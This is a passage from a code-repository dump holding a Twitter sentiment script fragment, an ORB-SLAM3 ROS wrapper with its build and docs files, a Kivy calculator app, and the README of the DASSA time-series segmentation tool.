tweets_to_data_frame(self, tweets): # Returns a data_frame of a tweets with required fields\n dataFrame = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=[\"tweets\"])\n dataFrame['Source'] = np.array([tweet.source for tweet in tweets])\n dataFrame['date'] = np.array([tweet.created_at for tweet in tweets])\n dataFrame['len'] = np.array([len(tweet.text) for tweet in tweets])\n dataFrame['likes'] = np.array([tweet.favorite_count for tweet in tweets])\n return dataFrame\n\n\nif __name__ == \"__main__\":\n user = TwitterClient()\n api = user.get_twitter_client_api()\n tweets = api.user_timeline(screen_name='MelissaBenoist', count=200)\n analyzer_temp = TweetAnalyzer()\n data_frame = analyzer_temp.tweets_to_data_frame(tweets)\n data_frame['Sentiment'] = np.array([analyzer_temp.analyze_tweet_sentiment(tweet) for tweet in data_frame['tweets']])\n print(data_frame)\n\n ################################\n # print(dir(tweets[0]))\n # print(data_frame.head(5))\n # print(data_frame['likes'])\n # print(dir(tweets[0]))\n # print(np.max(data_frame['likes']))\n # time_likes = pd.Series(data=data_frame['len'].values*100, index=data_frame['date'])\n # time_likes.plot(figsize=(16, 4), label='len', legend=True)\n # time_likes = pd.Series(data=data_frame['likes'].values, index=data_frame['date'])\n # time_likes.plot(figsize=(16, 4), label='likes', legend=True)\n # plt.show()\n\n ######################################\n # filename=\"karthik.json\"\n # hash_tag_list=[\"teradata\"]\n # tweets=user.get_timeline_tweets(0)\n # friends=user.get_friends(0)\n # print(\"the no of tweets for the given account id\",len(tweets),sep=\" \")\n # print(\"the no of friends for the given account id\",len(friends),sep=\" \")\n # for friend in friends:\n # print(friend)\n # helpers.write_to_a_file(\"tweets.json\",tweets)\n # helpers.write_to_a_file(\"friends.txt\",friends)\n # stream_tweets=TwitterStreamer()\n # stream_tweets.stream_tweets(filename,hash_tag_list)\n"
}
] | 3 |
National-Innovation-Center-Nepal/orb_slam_3_ros | https://github.com/National-Innovation-Center-Nepal/orb_slam_3_ros | 77e4dca204c4ce561d2a9a2d70734ff92a2f6c0f | e1dcb1c4b859f603f1c10c11c2ec76e1795d5bd0 | 980664f8134d17748c96f6acf481744bb0b67ba9 | refs/heads/main | 2023-03-16T20:36:37.586766 | 2021-03-15T07:05:36 | 2021-03-15T07:05:36 | 330,369,764 | 1 | 1 | null | 2021-01-17T10:57:34 | 2021-01-24T09:07:49 | 2021-01-24T09:49:30 | C++ | [
{
"alpha_fraction": 0.6601467132568359,
"alphanum_fraction": 0.6735941171646118,
"avg_line_length": 25.65217399597168,
"blob_id": "e214ad12904a11e3d0a9184bce64d26109e3218c",
"content_id": "e4664f75149f0b4b739e00e5b57e09665fb8b32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2454,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 92,
"path": "/src/ros_mono.cc",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "/**\n* This file is part of ORB-SLAM3\n*\n* Copyright (C) 2017-2020 Carlos Campos, Richard Elvira, Juan J. Gómez Rodríguez, José M.M. Montiel and Juan D. Tardós, University of Zaragoza.\n* Copyright (C) 2014-2016 Raúl Mur-Artal, José M.M. Montiel and Juan D. Tardós, University of Zaragoza.\n*\n* ORB-SLAM3 is free software: you can redistribute it and/or modify it under the terms of the GNU General Public\n* License as published by the Free Software Foundation, either version 3 of the License, or\n* (at your option) any later version.\n*\n* ORB-SLAM3 is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even\n* the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n* GNU General Public License for more details.\n*\n* You should have received a copy of the GNU General Public License along with ORB-SLAM3.\n* If not, see <http://www.gnu.org/licenses/>.\n*/\n\n\n#include<iostream>\n#include<algorithm>\n#include<fstream>\n#include<chrono>\n\n#include<ros/ros.h>\n#include <cv_bridge/cv_bridge.h>\n\n#include<opencv2/core/core.hpp>\n\n#include <System.h>\n\nusing namespace std;\n\nclass ImageGrabber\n{\npublic:\n ImageGrabber(ORB_SLAM3::System* pSLAM):mpSLAM(pSLAM){}\n\n void GrabImage(const sensor_msgs::ImageConstPtr& msg);\n\n ORB_SLAM3::System* mpSLAM;\n};\n\nint main(int argc, char **argv)\n{\n ros::init(argc, argv, \"Mono\");\n ros::start();\n\n if(argc != 3)\n {\n cerr << endl << \"Usage: rosrun ORB_SLAM3 Mono path_to_vocabulary path_to_settings\" << endl; \n ros::shutdown();\n return 1;\n } \n\n // Create SLAM system. It initializes all system threads and gets ready to process frames.\n ORB_SLAM3::System SLAM(argv[1],argv[2],ORB_SLAM3::System::MONOCULAR,true);\n\n ImageGrabber igb(&SLAM);\n\n ros::NodeHandle nodeHandler;\n ros::Subscriber sub = nodeHandler.subscribe(\"/usb_cam/image_raw\", 1, &ImageGrabber::GrabImage,&igb);\n\n ros::spin();\n\n // Stop all threads\n SLAM.Shutdown();\n\n // Save camera trajectory\n SLAM.SaveKeyFrameTrajectoryTUM(\"KeyFrameTrajectory.txt\");\n\n ros::shutdown();\n\n return 0;\n}\n\nvoid ImageGrabber::GrabImage(const sensor_msgs::ImageConstPtr& msg)\n{\n // Copy the ros image message to cv::Mat.\n cv_bridge::CvImageConstPtr cv_ptr;\n try\n {\n cv_ptr = cv_bridge::toCvShare(msg);\n }\n catch (cv_bridge::Exception& e)\n {\n ROS_ERROR(\"cv_bridge exception: %s\", e.what());\n return;\n }\n\n mpSLAM->TrackMonocular(cv_ptr->image,cv_ptr->header.stamp.toSec());\n}\n\n\n"
},
{
"alpha_fraction": 0.4848484992980957,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 23.75,
"blob_id": "617535053eafa72298b464aac2adea0bd6d44920",
"content_id": "a9bf2402700878ba1d019c61ee5d2285a15f69f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 4,
"path": "/docs/search/all_1.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['orb_5fslam3_2',['ORB_SLAM3',['../namespace_o_r_b___s_l_a_m3.html',1,'']]]\n];\n"
},
{
"alpha_fraction": 0.52173912525177,
"alphanum_fraction": 0.573913037776947,
"avg_line_length": 27.75,
"blob_id": "c2946d1aacb72a03433cda7290548e87d560a058",
"content_id": "a757331b81d80e1d96337f5d32de210dfb0d5739",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 115,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 4,
"path": "/docs/search/all_3.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['viewerar_4',['ViewerAR',['../class_o_r_b___s_l_a_m3_1_1_viewer_a_r.html',1,'ORB_SLAM3']]]\n];\n"
},
{
"alpha_fraction": 0.5843373537063599,
"alphanum_fraction": 0.608433723449707,
"avg_line_length": 32.20000076293945,
"blob_id": "424aef1e4722d20343c4341f0919ff565b2d6d4a",
"content_id": "e9d0ee2345d9f552ff7e31146f2bb14dbc028572",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 166,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 5,
"path": "/docs/search/all_0.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['imagegrabber_0',['ImageGrabber',['../class_image_grabber.html',1,'']]],\n ['imugrabber_1',['ImuGrabber',['../class_imu_grabber.html',1,'']]]\n];\n"
},
{
"alpha_fraction": 0.49038460850715637,
"alphanum_fraction": 0.5480769276618958,
"avg_line_length": 25,
"blob_id": "15920947d986203818cfc4ab013d6caef81dcf3d",
"content_id": "c6e9e041ae697187d76f64493c6c6643e409a147",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 4,
"path": "/docs/search/classes_1.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['plane_7',['Plane',['../class_o_r_b___s_l_a_m3_1_1_plane.html',1,'ORB_SLAM3']]]\n];\n"
},
{
"alpha_fraction": 0.7265306115150452,
"alphanum_fraction": 0.7448979616165161,
"avg_line_length": 51.46428680419922,
"blob_id": "df776b264b3039d78a07dde285ebb93753a79b25",
"content_id": "c2b5c248a6bb9fe7eeded165142b2582131e71b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1470,
"license_type": "no_license",
"max_line_length": 270,
"num_lines": 28,
"path": "/README.md",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "# orb_slam_3_ros \nDescription: \nThis repo contains both the standalong orb_slam3 module and ros wrapper for that orb_slam_3_ros. \n\nTo install this package: \n1. Clone this package \n2. build with catkin_make \n\n<h4> To run the mono slam: </h4> \nroslaunch orb_slam_3_ros mono_euroc.launch \nSubscribed topic: /usb_cam/image_raw (sensor_msgs/Image) \n\n<h4> To run the mono inertial slam: </h4> \nroslaunch orb_slam_3_ros mono_inertial_euroc.launch \n\nSubscribed topic: /usb_cam/image_raw (sensor_msgs/Image) \n /imu (sensor_msgs/Imu) \n \nAccording to the test on openvslam and orb_slam3 somehow orb_slam3 has showng bettern resutls when running visual slam processs.\n\nTodo:\n1. Integration of gridmap feature in this package such that when running slam 2d occupency grid map is generated in real time. Another package whih has tried smae thing which can be used and improved for better reliablility. https://github.com/skylook/ORB_SLAM2-gridmap \n2. SaveMap and LoadMap function implementation. https://github.com/UZ-SLAMLab/ORB_SLAM3/blob/master/include/System.h \n3. Fully ros compatible and removal of Pangolin viewer \n 3.1 pointcloud publisher \n 3.2 image publisher \n 3.3 dynamic reconfigurable parameters to change the orb_slam3 parameters in run time dynamically\n( Note: Adding ros data publisher like sensor_msgs/Image or sensor_msgs/PointCluod2 is not complecated. Binding them with real data peroperly is. \n"
},
{
"alpha_fraction": 0.7032085657119751,
"alphanum_fraction": 0.718716561794281,
"avg_line_length": 21.530120849609375,
"blob_id": "6e28f14ad90651d010e5fbe396b7b2f53bcd53d5",
"content_id": "47a4cd147c98f736c0619b6ee6034ad379677f6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 3740,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 166,
"path": "/CMakeLists.txt",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 2.8)\nproject(orb_slam3_ros)\n\nIF(NOT CMAKE_BUILD_TYPE)\n SET(CMAKE_BUILD_TYPE Release)\nENDIF()\n\nMESSAGE(\"Build type: \" ${CMAKE_BUILD_TYPE})\n\nset(CMAKE_C_FLAGS \"${CMAKE_C_FLAGS} -Wall -O3\")\nset(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -Wall -O3\")\nset(CMAKE_C_FLAGS_RELEASE \"${CMAKE_C_FLAGS_RELEASE} -march=native\")\nset(CMAKE_CXX_FLAGS_RELEASE \"${CMAKE_CXX_FLAGS_RELEASE} -march=native\")\n\n# set(CMAKE_C_FLAGS \"${CMAKE_C_FLAGS} -Wall -Wno-deprecated -O3 -march=native \")\n# set(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -Wall -Wno-deprecated -O3 -march=native\")\n\n# Check C++11 or C++0x support\ninclude(CheckCXXCompilerFlag)\nCHECK_CXX_COMPILER_FLAG(\"-std=c++11\" COMPILER_SUPPORTS_CXX11)\nCHECK_CXX_COMPILER_FLAG(\"-std=c++0x\" COMPILER_SUPPORTS_CXX0X)\nif(COMPILER_SUPPORTS_CXX11)\n set(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -std=c++11\")\n add_definitions(-DCOMPILEDWITHC11)\n message(STATUS \"Using flag -std=c++11.\")\nelseif(COMPILER_SUPPORTS_CXX0X)\n set(CMAKE_CXX_FLAGS \"${CMAKE_CXX_FLAGS} -std=c++0x\")\n add_definitions(-DCOMPILEDWITHC0X)\n message(STATUS \"Using flag -std=c++0x.\")\nelse()\n message(FATAL_ERROR \"The compiler ${CMAKE_CXX_COMPILER} has no C++11 support. Please use a different C++ compiler.\")\nendif()\n\nLIST(APPEND CMAKE_MODULE_PATH ${ROOT_DIR}/cmake_modules)\n\nfind_package(OpenCV 4.2)\nif(NOT OpenCV_FOUND)\n find_package(OpenCV 2.4.3 QUIET)\n if(NOT OpenCV_FOUND)\n message(FATAL_ERROR \"OpenCV > 2.4.3 not found.\")\n endif()\nendif()\n\nMESSAGE(\"OPENCV VERSION:\")\nMESSAGE(${OpenCV_VERSION})\n\nfind_package (catkin REQUIRED COMPONENTS\nroscpp\nrospy\nstd_msgs\ncv_bridge\nimage_transport\ntf\nsensor_msgs\ndynamic_reconfigure\nmessage_generation\n)\n\nfind_package(Eigen3 3.1.0 REQUIRED)\nfind_package(Pangolin REQUIRED)\n\nfind_package(Eigen3 3.1.0 REQUIRED)\n\nset (DYNAMIC_RECONFIGURE_PATH config/dynamic_reconfigure.cfg)\nexecute_process(COMMAND chmod a+x ${DYNAMIC_RECONFIGURE_PATH}\n WORKING_DIRECTORY ${PROJECT_SOURCE_DIR}\n RESULT_VARIABLE cmd_result\n OUTPUT_VARIABLE cmd_ver)\nmessage(STATUS \"Chmod a+x the dynamic_reconfigure file\")\n\ngenerate_dynamic_reconfigure_options(\n ${DYNAMIC_RECONFIGURE_PATH}\n)\n\nadd_service_files(\n FILES\n SaveMap.srv\n)\n\ngenerate_messages(\n DEPENDENCIES\n std_msgs\n)\n\nset(ROOT_DIR /home/ubuntu/ORB-SLAM3)\n\ninclude_directories(\ninclude\n${ROOT_DIR}\n${ROOT_DIR}/include\n${ROOT_DIR}/include/CameraModels\n${EIGEN3_INCLUDE_DIR}\n${Pangolin_INCLUDE_DIRS}\n${catkin_INCLUDE_DIRS}\n)\n\ncatkin_package (\n CATKIN_DEPENDS roscpp rospy std_msgs cv_bridge image_transport tf sensor_msgs dynamic_reconfigure message_runtime\n LIBRARIES {PROJECT_NAME} libDBoW2 libg2o\n)\n\nset(ORB_SLAM3 ${ROOT_DIR}/lib/libORB_SLAM3.so)\n\n# Build examples\n\n#add_executable (${PROJECT_NAME}_mono\n#src/MonoNode.cc\n#src/Node.cc\n#)\n#add_dependencies (${PROJECT_NAME}_mono ${PROJECT_NAME} ${PROJECT_NAME}_gencfg)\n\nset(LIBS\n ${ORB_SLAM3}\n ${catkin_LIBRARIES}\n ${EIGEN3_LIBS}\n ${Pangolin_LIBRARIES}\n ${ROOT_DIR}/Thirdparty/DBoW2/lib/libDBoW2.so\n ${ROOT_DIR}/Thirdparty/g2o/lib/libg2o.so\n -lboost_serialization\n -lcrypto\n)\n\n# Node for monocular camera\nadd_executable(Mono\nsrc/ros_mono.cc\n)\n\ntarget_link_libraries(Mono\n${LIBS}\n)\n\n# Node for stereo camera\nadd_executable(Stereo\nsrc/ros_stereo.cc\n)\n\ntarget_link_libraries(Stereo\n${LIBS}\n)\n\n# Node for RGB-D camera\nadd_executable(RGBD\nsrc/ros_rgbd.cc\n)\n\ntarget_link_libraries(RGBD\n${LIBS}\n)\n\n# Node for monocular-inertial camera\nadd_executable(Mono_Inertial\nsrc/ros_mono_inertial.cc\n)\n\ntarget_link_libraries(Mono_Inertial\n${LIBS}\n)\n\n# Node for stereo-inertial camera\nadd_executable(Stereo_Inertial\nsrc/ros_stereo_inertial.cc\n)\n\ntarget_link_libraries(Stereo_Inertial\n${LIBS}\n)\n"
},
{
"alpha_fraction": 0.4848484992980957,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 23.75,
"blob_id": "bb9cb39af15e641d61e9011ba48f238d276615f0",
"content_id": "9d507ae0d39ff6031143cd617b3cde166bd7acc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 4,
"path": "/docs/search/namespaces_0.js",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['orb_5fslam3_9',['ORB_SLAM3',['../namespace_o_r_b___s_l_a_m3.html',1,'']]]\n];\n"
},
{
"alpha_fraction": 0.5501222610473633,
"alphanum_fraction": 0.567237138748169,
"avg_line_length": 61.92307662963867,
"blob_id": "f97aab453a6732c42523e75b301b94548b0b6ce9",
"content_id": "b735195b016a7ea3d8e5d8499557bbf6324a6bcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 818,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 13,
"path": "/config/dynamic_reconfigure.cfg",
"repo_name": "National-Innovation-Center-Nepal/orb_slam_3_ros",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nPACKAGE = \"orb_slam3_ros\"\n\nfrom dynamic_reconfigure.parameter_generator_catkin import *\n\ngen = ParameterGenerator()\n\ngen.add(\"localize_only\", bool_t, 0, \"Disable mapping, localize only\", False)\ngen.add(\"reset_map\", bool_t, 0, \"Erase the map; toggles back to false automatically\", False)\ngen.add(\"min_num_kf_in_map\", int_t, 0, \"Minimum number of key frames in the map for initialization\", 5, 1, 50)\ngen.add(\"min_observations_for_ros_map\", int_t, 0, \"Min num of observations per point for the point cloud; Doesn't change the SLAM itself\", 4, 2, 30)\n\nexit(gen.generate(PACKAGE, \"orb_slam3_ros\", \"dynamic_reconfigure\"))\n"
}
] | 9 |
alienobserver/Calculator | https://github.com/alienobserver/Calculator | 9da297c78da9799690abb3bbc7e74e5cc8bc4efd | 9a3cfb53442a155c0976054cb25d28a8468cb928 | 8c56af354800ed7ded1960f8d331573426bd5848 | refs/heads/main | 2023-04-24T01:48:53.561779 | 2021-05-04T13:00:00 | 2021-05-04T13:00:00 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.600669264793396,
"alphanum_fraction": 0.6101505756378174,
"avg_line_length": 43,
"blob_id": "5e53ffd49cab7ac4a2f1ae2f5f9150d3ed6dc1ea",
"content_id": "c38e622ecd6dcf2fc65dba1364c55cd9eb4a3e89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7176,
"license_type": "no_license",
"max_line_length": 177,
"num_lines": 163,
"path": "/calculator.py",
"repo_name": "alienobserver/Calculator",
"src_encoding": "UTF-8",
"text": "# Calculator App\n# install python kivy with $ pip install kivy\n\nfrom kivy.app import App\nfrom kivy.config import Config\n\n# Size of app\nwidth = 350\nheight = 500\n\nConfig.set( 'graphics', 'resizable' , False )\nConfig.set( 'graphics', 'width' , width )\nConfig.set( 'graphics', 'height' , height )\n\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.label import Label\nfrom kivy.core.window import Window\n\nfrom math import sqrt, sin, cos, tan, radians\nfrom mpmath import cot, pi\nimport os, sys\n\nWindow.clearcolor = (0.1, 0.1, 0.1, 1)\n\n# sin, cos, tan, cot function for degrees\ndef sinA(deg):\n return sin(radians(deg))\n\ndef cosA(deg):\n return cos(radians(deg))\n\ndef tanA(deg):\n return tan(radians(deg))\n\ndef cotA(deg):\n return cot(radians(deg))\n\n# The main class\nclass CalculatorApp(App):\n # calculate the result in label if theres an error return message\n def calc_result(self, instance):\n try:\n self.lb.text = str(eval(self.lb.text))\n\n except ZeroDivisionError:\n self.formula = \"Can\\'t divide by 0\"\n self.lb.text = self.formula\n\n except SyntaxError:\n self.formula = \"Wrong Expression\"\n self.lb.text = self.formula\n\n except ValueError:\n self.formula = \"Wrong Expression\"\n self.lb.text = self.formula\n\n else:\n self.formula = \"0\"\n\n def update_label(self):\n self.lb.text = self.formula\n\n def add_number(self, instance):\n # Clear the label before adding nums\n if self.formula == \"0\" or self.formula == \"Wrong Expression\" or self.formula == \"Can\\'t divide by 0\":\n self.formula = \"\"\n\n self.formula += str(instance.text)\n self.update_label()\n\n def add_operation(self, instance):\n # Clear the label before adding opers\n if self.formula == \"0\" or self.formula == \"Wrong Expression\" or self.formula == \"Can\\'t divide by 0\":\n self.formula = \"\"\n\n # Translate the needed words to functions\n if str(instance.text).lower() == \"x\":\n self.formula += '*'\n\n elif str(instance.text).lower() == \"^\":\n self.formula += '**'\n\n elif str(instance.text).lower() == \"√\":\n self.formula += 'sqrt('\n\n elif str(instance.text).lower() == \"sin\":\n self.formula += 'sinA('\n\n elif str(instance.text).lower() == \"cos\":\n self.formula += 'cosA('\n\n elif str(instance.text).lower() == \"tan\":\n self.formula += 'tanA('\n\n elif str(instance.text).lower() == \"cot\":\n self.formula += 'cotA('\n\n else:\n self.formula += str(instance.text)\n\n self.update_label()\n\n def clear(self, instance):\n self.formula = \"0\"\n\n def build(self):\n # Setting icon's path\n self.icon = (os.path.abspath(os.path.dirname(sys.argv[0])) + \"/keys.png\").replace(\"\\\\\", \"/\")\n self.formula = \"0\"\n self.colNums = [0.2, 0.2, 0.2, 1]\n self.colOpers = [0.15, 0.15, 0.15, 1]\n\n #The main Box Layout\n bl = BoxLayout( orientation = 'vertical', padding = [3] )\n\n # The main gridlayout where are all buttons\n gl = GridLayout( cols = 5, spacing = 3, size_hint = (1, .6) )\n\n # The main label\n self.lb = Label( text = \"0\",font_size = 30, halign = \"right\", valign = \"center\", size_hint = (1, .4), text_size = (width - 50, height * .4 - 50) , color = [1, 1, 1, 1] )\n\n # Add The GridLayout and The label to The BoxLayout \n bl.add_widget( self.lb )\n bl.add_widget( gl )\n\n # Setting all buttons and adding them to the gridlayout\n gl.add_widget( Button( text = \"√\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"^\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"(\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \")\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"CE\", on_press = self.clear, background_color = self.colOpers , background_normal = '' ) )\n\n gl.add_widget( Button( text = \"7\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"8\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"9\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"X\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"sin\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n\n gl.add_widget( Button( text = \"4\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"5\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"6\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"-\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"cos\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n\n gl.add_widget( Button( text = \"1\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"2\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"3\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"+\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"tan\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n\n gl.add_widget( Button( text = \"=\", on_press = self.calc_result, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"0\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \".\", on_press = self.add_number, background_color = self.colNums , background_normal = '' ) )\n gl.add_widget( Button( text = \"/\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n gl.add_widget( Button( text = \"cot\", on_press = self.add_operation, background_color = self.colOpers , background_normal = '' ) )\n\n return bl\n\nif __name__ == \"__main__\":\n CalculatorApp().run()\n"
},
{
"alpha_fraction": 0.748633861541748,
"alphanum_fraction": 0.748633861541748,
"avg_line_length": 13.076923370361328,
"blob_id": "b218f55e8e7e37df65dcd3e67d998aa28faafd6f",
"content_id": "583b09dc338112606c66bd79dfe8e8f4a35aab11",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 183,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 13,
"path": "/README.md",
"repo_name": "alienobserver/Calculator",
"src_encoding": "UTF-8",
"text": "# Calculator\nA simple calculator created with Python and Kivy\n\nTo install kivy run\n```sh\npip install kivy\n```\n\nTo run the application run\n```sh\ncd Calculator\npython calculator.py\n```\n"
}
] | 2 |
SorourAmiri/DASSA | https://github.com/SorourAmiri/DASSA | cf64790f09407d3e023bb2caa7a7c902d4b6c43e | 648872e3b77844e54f8a124464cd77fffb4cd366 | 1676668fa0f54df0609beca1f000c0b6a14381e2 | refs/heads/master | 2018-12-18T14:52:59.126474 | 2018-09-14T17:20:46 | 2018-09-14T17:20:46 | 119,204,466 | 3 | 4 | null | null | null | null | null | [
{
"alpha_fraction": 0.5963523983955383,
"alphanum_fraction": 0.6648313999176025,
"avg_line_length": 26.40566062927246,
"blob_id": "4e6a04ca774c01a9dab43d9d62db3f0ab3432f1a",
"content_id": "208ada5bcfbb37874ec0de6aee36bf8c1334af37",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2906,
"license_type": "no_license",
"max_line_length": 223,
"num_lines": 106,
"path": "/README.md",
"repo_name": "SorourAmiri/DASSA",
"src_encoding": "UTF-8",
"text": "Automatic Segmentation of General Time-Stamped Data Sequences (AAAI 2018)\n==========================================================================\n\nAuthors: Liangzhe Chen, Sorour E. Amiri, and B. Aditya Prakash\n\nDate: March, 2018\n\nCiting\n------\nIf you find DASSA useful in your research, we ask that you cite the following paper:\n```\n@inproceedings{DBLP:conf/aaai/ChenAP18,\n author = {Liangzhe Chen and\n Sorour E. Amiri and\n B. Aditya Prakash},\n title = {Automatic Segmentation of Data Sequences},\n booktitle = {Proceedings of the Thirty-Second {AAAI} Conference on Artificial Intelligence,\n New Orleans, Louisiana, USA, February 2-7, 2018},\n year = {2018},\n crossref = {DBLP:conf/aaai/2018},\n url = {https://www.aaai.org/ocs/index.php/AAAI/AAAI18/paper/view/17300},\n timestamp = {Thu, 03 May 2018 17:03:19 +0200},\n biburl = {https://dblp.org/rec/bib/conf/aaai/ChenAP18},\n bibsource = {dblp computer science bibliography, https://dblp.org}\n}\n```\n\nUsage:\n-----\nNote: You need to set the correct MATLAB_path in the makefile (Including the MATLAB executable).\n```\n- Example:\n MATLAB_path = '/Applications/MATLAB_R2016a.app/bin/matlab'\n``` \nTo run DASSA do as follows,\n```\n>> make demo \n```\n\n'make demo' will run the DASSA for toy example. \n\nYou can directly run DASSA with the following command:\n```\n>> python dassa.py <data_path> <matlab_path> <min_window> <num_of_clusters> <calc_mode>\n```\n\n- <data_path> : Directory of the dataset\n \n- <matlab_path>: Directory of MATLAB in your machine\n\n- <min_window>: Minimum desired length for segmentation (i.e., s_min)\n\n- <num_of_clusters>: Number of co-occurring clusters (It will be used if <calc mode> is 0)\n\n- <calc_mode>: 0/1 value. if <calc mode> is 0 DASSA directly use <num of clusters> as the number of co-occurring clusters. Otherwise it automatically detects the best number of clusters.\n\n```\n- Example: \n python dassa.py './data/test/' '/Applications/MATLAB_R2016a.app/bin/matlab' 172800 5 0\n```\n\n\n\nInput: \n------\n- input.txt is a tab separated file. Each row represents a multidimensional observation. Each column is the value of each dimension, and the last column in each row represents the timestamp of the corresponding observation.\n\nThe input.txt file for dassa.py looks like as follows:\n\n```\nf11 f12 f13 f14 ... f1n t1\nf21 f22 f23 f24 ... f2n t2\nf31 f32 f33 f34 ... f3n t3\n.\n.\n.\n```\n\n\n\nOutput:\n-------\n\n- Segmentation.txt: It shows the final segmentation result. For example,\n```\n'628490000.0-630390000.0', '630390000.0-630560000.0', '630560000.0-633760000.0'\n```\n\nIt means DASSA detects a cut point at time 630390000.0 and 630560000.0 in the time interval [628490000.0-633760000.0]\n\n- Intermediate results:\nThe following are the intermediate files of the above example:\n\n Xtilde.txt\n \n BeginEndTime.txt\n \n P_Xtilde_Y.txt\n \n X.txt\n \n Y.txt\n \n Ytilde.txt\n \n ALP_runnimgtime.txt\n\n"
},
{
"alpha_fraction": 0.5177218914031982,
"alphanum_fraction": 0.5298394560813904,
"avg_line_length": 30.150943756103516,
"blob_id": "0026b753f752f4a9ac844f7237de23f0f7468f54",
"content_id": "a22d49d7a85bdc688ba7c8af00d0f58c6647afe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3301,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 106,
"path": "/ALP.py",
"repo_name": "SorourAmiri/DASSA",
"src_encoding": "UTF-8",
